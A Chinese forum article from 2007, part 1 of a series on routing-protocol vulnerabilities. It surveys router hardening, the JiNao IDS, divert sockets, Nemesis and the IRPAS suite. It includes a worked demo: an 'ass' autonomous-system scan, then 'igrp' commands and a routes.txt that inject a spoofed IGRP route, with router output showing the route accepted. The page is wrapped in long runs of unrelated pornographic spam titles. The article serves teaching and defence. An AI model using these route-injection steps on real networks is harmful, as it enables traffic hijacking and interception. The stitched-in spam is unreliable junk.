国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

關于一些路由協議的漏洞(1)
2007-09-03   eNet論壇

此文章討論了有關對網絡底層協議的攻擊和防止攻擊的方法,特別是關于路由和路由協議的漏洞,如Routing Information Protocol (RIP,路由信息協議), Border Gateway Protocol (邊緣網關協議), Open Shortest Path First (OSPF,開放最短路徑優先協議)等。

路由器在每個網絡中起到關鍵

的作用,如果一路由器被破壞或者一路由被成功的欺騙,網絡的完整性將受到嚴重的破壞,如果使用路由的主機沒有使用加密通信那就更為嚴重,因為這樣的主機被控制的話,將存在著中間人(man-in-the-middle)攻擊,拒絕服務攻擊,數據丟失,網絡整體性破壞,和信息被嗅探等攻擊。

路由是一個巨大又復雜的話題,所以本人只是在此提到一部分知識,而且水平的關系,請大家多多指教。

關于一些很普遍的路由器安全問題

多種路由器存在各種眾所周知的安全問題,一些網絡底層設備提供商如Cisco, Livingston, Bay等的普通安全問題大家可以參考下面地址,其中收集了不少安全漏洞:

http://www.antionline.com/cgi-bin/anticode/anticode.pl?dir=router-exploits

上面地址所收集的漏洞大部分無關于路由協議級的攻擊,而是一些由于錯誤配置,IP信息包錯誤處理,SNMP存在默認的communit name string,薄弱密碼或者加密算法不夠強壯而造成。上面的一些攻擊一般一個標準的NIDS都能夠探測出來。這些類型的攻擊對網絡底層有一定的削弱性并可以組合一些高極別的協議進行攻擊。

正確的配置管理可以處理不少普通的漏洞,如你必須處理一些標準的規程:不使用SNMP(或者選擇強壯的密碼),保持補丁程序是最新的,正確處理訪問控制列表,出入過濾,防火墻,加密管理通道和密碼,路由過濾和使用MD5認證。當然在采用這些規程之前你必須知道這些安全規則的相關的含義和所影響到的服務。

近來有關的一些低部構造防衛檢測系統的開發

近來的在網絡防護開發項目中比較不錯的是一個IDS叫JiNao,你可以在下面的地址找到相關的內容:http://www.anr.mcnc.org/projects/JiNao/JiNao.html. JiNao是由DARPA發起的,并現在成為一個合作研究項目由MCNC和北卡羅萊納州大學共同開發。JiNao在FreeBSD和Linux上運行的是在線模式(使用divert sockets),在Solaris運行在離線模式,并在3個網絡上測試-MCNC,NCSU和由PC(操作系統做路由)和商業路由器組合的AF/Rome 實驗室。測試結果顯示了可以成功的防止多種類型的網絡底層攻擊并能很好的高精度的探測這些攻擊。

當前,JiNao看起來在研究關于Open Shortest Path First (OSPF,開放最短路徑優先)協議,并且最終JiNao會延伸到各種協議。JiNao指出,防衛攻擊和入侵探測將會集成在網絡管理內容中,所以JINao現在正趨向于網絡防火墻,入侵探測系統和網絡管理系統組合一體。

還有一個工具可以很好的分析高級的協議,如Agilent Advisor

(http://onenetworks.comms.agilent.com/)的網絡分析工具,它能很好的支持多種路由協議并能定制過濾器來探測各種不正常的行為。

一些工作于路由協議的工具

Linux divert sockets描述到:\"Divert socket能夠在末端主機也能在路由器上進行IP信息包捕獲和注入,信息包的捕獲和插入發生在IP層上,捕獲的信息包在用戶空間轉向到套接口中,因此這些信息包將不會達到它們的最終目的地,除非用戶空間套接口重插入它們。這樣在信息包捕獲和重新插入之間可以在系統系統內核之外允許各種不同的操作(如路由和防火墻).\"(http://www.anr.mcnc.org/~divert/).簡單的說divert socket就是由user space(用戶空間)的程序來處理kernel(內核)中的IP packet(IP信息包),這個divert socket最早應用與FreeBSD系統中,如NAT就是應用了divert socket。這樣使開發程序很容易,因為在用戶層,而處理IP packet(IP信息包)的效率也比較高,因為是直接處理kernel(內核)中的IP packet(IP信息包)。

大家可以在下面的地址中找到相關的Divert socket:http://www.anr.mcnc.org/~divert/. Divert socket就象上面說最早實現于FreeBSD中,現在已經移植到Linux中并作為JiNao IDS項目的一部分采用。

另一個叫Nemesis Packet Injection suite,是一個比較強大的網絡和安全工具,由Obecian開發,你可以在下面的地址獲得:http://www.packetninja.net.最新的nemesis-1.1發行在2000年6月24號。Nemesis是一個\"命令行式的UNIX網絡信息包插入套件\",并是一個很好的測試防火墻,入侵探測系統,路由器和其他網絡環境的工具。它可以被攻擊者使用和授權滲透探測者在主機和網絡級的網絡安全環境檢測。其中這個站點還有一個演化的Nemesis叫Intravenous,發行于11/30/00. Intravenous看起來承載了Nemesis所有基本功能,其中不同的是增加了人工智能引擎的內容。更多有關Intravenous的信息你可以在packetninja.net站點里找到.

IRPAS,Internetwork Routing Protocol Attack Suite,由FX所寫,可以在下面的站點找到http://www.phenoelit.de/irpas/.IRPAS包含了各種可工作于Cisco路由設備的協議層的命令行工具,包括如下這些命令: cdp--可發送Cisco router Discovery Protocol (CDP CISCO路由發現協議)消息;

igrp是能插入Interior Gateway Routing Protocol (IGRP 內部網關路由協議)消息;irdp用來發送ICMP Router Discovery Protocol (ICMP路由發現協議)消息;

irdresponder--可使用精心制作的信息包來響應IRDP請求;

ass--Autonomous System Scanner(自主系統掃描器,現在可下載的版本只支持IGRP),這里解釋下Autonomous system,即一般所說的AS,簡單的說是一組內部路由器,使用共同協議交流內部網絡的信息,更直接的說法就是這些路由器自己自主,交流信息。與之相反的是我們經常知道的外部路由器如一般的電信節點處的路由器。典型的AS使用單一的路由協議在它的邊界產生和傳播路由信息。ass就類似于TCP端口掃描器一樣,只不過其是針對自主系統的。使用ass掃描的話,如果自主系統應答,將返回路由進程中的所有路由信息。IRPAS 的網站也包含一條關于Generic Routing Encapsulation(GRE 一般路由封裝) 漏洞的文檔,其中這個Generic Routing Encapsulation (GRE 一般路由封裝)漏洞允許外部攻擊者繞過NAT和破壞一通過VPN的內部RFC1918網絡。這份文檔大家可以在下面的地址獲得:http://www.phenoelit.de/irpas/gre.html,其中在其他章節還包含了更多的信息和通過irpas的可能攻擊策略.

irpas的開發者FX,發送了由ass新版本2.14(還沒有發布)掃描的AS樣本和igrp怎樣利用ass的信息(AS #10和其他數據)來插入一欺騙的路由給222.222.222.0/24。雖然IGRP協議目前不是很多使用,但這個例子卻是相當的不錯。下面是FX測試的結果:

test# ./ass -mA -i eth0 -D 192.168.1.10 -b15 -v(這里的-i是接口,-D是目的地址,-b15指的是自主系統0-15之間

ASS [Autonomous System Scanner] $Revision: 2.14 $ 

(c) 2k FX

Phenoelit (http://www.phenoelit.de)

No protocols selected; scanning all

Running scan with:

interface eth0

Autonomous systems 0 to 15

delay is 1

in ACTIVE mode

Building target list ...

192.168.1.10 is alive

Scanning ...

Scanning IGRP on 192.168.1.10

Scanning IRDP on 192.168.1.10

Scanning RIPv1 on 192.168.1.10

shutdown ...

OK,得到以下的結果

>>>>>>>>>>>> Results >>>>>>>>>>>

192.168.1.10

IGRP

#AS 00010 10.0.0.0 (50000,1111111,1476,255,1,0)

IRDP

192.168.1.10 (1800,0)

192.168.9.99 (1800,0)

RIPv1

10.0.0.0 (1)

test# ./igrp -i eth0 -f routes.txt -a 10 -S 192.168.1.254 -D 192.168.1.10

當然這里的routes.txt需要你自己指定:

routes.txt:

# Format

# destination:delay:bandwith:mtu:reliability:load:hopcount

222.222.222.0:500:1:1500:255:1:0

Cisco#sh ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP

D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area

E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP

i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default

U - per-user static route

Gateway of last resort is not set

10.0.0.0/8 is variably subnetted, 2 subnets, 2 masks

C 10.1.2.0/30 is directly connected, Tunnel0

S 10.0.0.0/8 is directly connected, Tunnel0

C 192.168.9.0/24 is directly connected, Ethernet0

C 192.168.1.0/24 is directly connected, Ethernet0

I 222.222.222.0/24 [100/1600] via 192.168.1.254, 00:00:05, Ethernet0


熱詞搜索:

上一篇:尋根究底 解惑無線路由器無法登錄之謎
下一篇:關于一些路由協議的漏洞(2)

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲国产日韩精品| 免费在线观看一区二区三区| 亚洲欧美在线视频观看| 国产裸体歌舞团一区二区| 日韩三级在线免费观看| 蜜臀av在线播放一区二区三区| 欧美主播一区二区三区| 亚洲综合免费观看高清完整版在线 | 国内精品不卡在线| 久久久精品免费观看| 国产成人丝袜美腿| 亚洲精品国产精品乱码不99| 欧美艳星brazzers| 六月婷婷色综合| 国产精品久久久爽爽爽麻豆色哟哟 | 欧美一区二区三区视频| 久久草av在线| 亚洲三级在线播放| 欧美一区二区在线观看| 成人动漫av在线| 午夜精品福利一区二区三区av | 亚洲综合一区在线| 久久久久久9999| 色天使色偷偷av一区二区| 麻豆一区二区99久久久久| 国产精品国产三级国产专播品爱网 | 悠悠色在线精品| 久久久久久久免费视频了| 在线观看免费亚洲| 国产成人免费在线观看不卡| 亚洲一区二区偷拍精品| 日本一区二区不卡视频| 91麻豆精品国产91久久久使用方法 | 色视频一区二区| 国产自产视频一区二区三区| 亚洲一区二区三区美女| 国产午夜亚洲精品午夜鲁丝片| 欧美日韩三级一区| 91黄色小视频| 91在线国内视频| 大白屁股一区二区视频| 韩国在线一区二区| 秋霞av亚洲一区二区三| 一区二区三区在线高清| 国产精品美女一区二区在线观看| 欧美成人午夜电影| 欧美一区二区三区在线观看| 欧美专区在线观看一区| 91久久免费观看| 91丝袜呻吟高潮美腿白嫩在线观看| 国产精品综合在线视频| 久久激情五月婷婷| 美女视频网站黄色亚洲| 日本美女一区二区| 日韩成人av影视| 日本欧美久久久久免费播放网| 日韩精品午夜视频| 日韩av中文在线观看| 日韩不卡免费视频| 理论电影国产精品| 久久99国产精品免费| 久久99精品久久久| 国产又黄又大久久| 国产一区二区久久| 成人av网站在线| 91美女片黄在线观看91美女| 色综合久久久久久久| 在线免费观看日韩欧美| 欧美日韩国产欧美日美国产精品| 欧美三级电影网| 欧美电影一区二区三区| 日韩欧美精品三级| 国产清纯在线一区二区www| 国产午夜精品久久久久久免费视 | 国产日韩精品一区二区三区| 国产午夜一区二区三区| 国产精品乱人伦一区二区| 中文字幕中文字幕在线一区 | 日韩高清不卡在线| 日本网站在线观看一区二区三区| 日本亚洲电影天堂| 国产成人精品免费一区二区| 成人性生交大片| 欧美曰成人黄网| 欧美日韩一二三| 日韩久久免费av| 日本一区二区成人在线| 亚洲一区二区三区在线播放| 免费日韩伦理电影| 99综合电影在线视频| 欧美私模裸体表演在线观看| 精品福利一区二区三区免费视频| 欧美激情一二三区| 亚洲成av人**亚洲成av**| 久久99国内精品| 一本到不卡精品视频在线观看| 在线播放日韩导航| 中文字幕欧美激情| 青青草一区二区三区| jizz一区二区| 精品日韩av一区二区| 一区二区三区四区视频精品免费 | 在线欧美日韩国产| 国产欧美综合在线| 视频一区二区欧美| 91影视在线播放| 久久久电影一区二区三区| 亚洲成av人影院在线观看网| 不卡在线视频中文字幕| 精品国产电影一区二区| 午夜欧美大尺度福利影院在线看| 国产成人午夜精品影院观看视频| 777a∨成人精品桃花网| 亚洲激情六月丁香| 成人黄页毛片网站| 国产亚洲一区二区三区在线观看| 亚洲成av人片在线观看无码| 91久久精品一区二区二区| 日本一区二区高清| 国产成人福利片| 精品成人在线观看| 美女mm1313爽爽久久久蜜臀| 欧美日本一道本在线视频| 亚洲色图.com| 91在线精品秘密一区二区| 国产精品日日摸夜夜摸av| 国产乱一区二区| 欧美成人官网二区| 久久99九九99精品| 亚洲精品一区二区三区香蕉| 另类小说一区二区三区| 日韩午夜在线影院| 老司机免费视频一区二区 | 91亚洲精品久久久蜜桃网站| 中文av字幕一区| 国产**成人网毛片九色| 国产欧美日韩综合| 国产精品一区不卡| 国产视频一区二区在线观看| 国产成人亚洲综合a∨婷婷图片| 久久精品人人做人人爽97| 国产精品18久久久久久久久| 国产香蕉久久精品综合网| 懂色av一区二区三区免费看| 国产精品无码永久免费888| 不卡av在线网| 亚洲一区二区三区四区在线观看 | 91在线免费视频观看| 一区二区三区免费看视频| 欧美色中文字幕| 日本系列欧美系列| 欧美韩日一区二区三区| 色999日韩国产欧美一区二区| 亚洲在线观看免费| 欧美一区二区不卡视频| 国产麻豆精品视频| 亚洲视频一二区| 欧美猛男gaygay网站| 韩国av一区二区三区四区| 日本一区二区三级电影在线观看| www.亚洲色图.com| 亚洲福利视频导航| 欧美mv日韩mv国产| 92国产精品观看| 免费看日韩精品| 中文字幕视频一区二区三区久| 欧美日韩小视频| 国产成人精品一区二| 一区二区三区在线不卡| 欧美本精品男人aⅴ天堂| 色综合天天综合网天天看片| 免费观看成人鲁鲁鲁鲁鲁视频| 久久久久久久综合日本| 在线一区二区三区| 国产美女精品在线| 亚洲成人1区2区| 国产精品午夜电影| 日韩三级av在线播放| 91在线精品一区二区| 国产精品影视网| 视频在线观看国产精品| 国产精品嫩草影院com| 日韩一区二区免费在线观看| 91免费国产在线| 国产精品一卡二| 精品一区二区免费视频| 亚洲va欧美va国产va天堂影院| 欧美激情综合五月色丁香| 欧美一区午夜视频在线观看| 色综合天天综合网天天狠天天| 国产乱码一区二区三区| 蜜乳av一区二区| 亚洲成人一区在线| 亚洲精品成人少妇| 亚洲丝袜制服诱惑| 国产精品久久久久aaaa樱花| 久久精品一区二区| 精品国产凹凸成av人网站| 欧美一区二区视频在线观看| 欧美日本视频在线|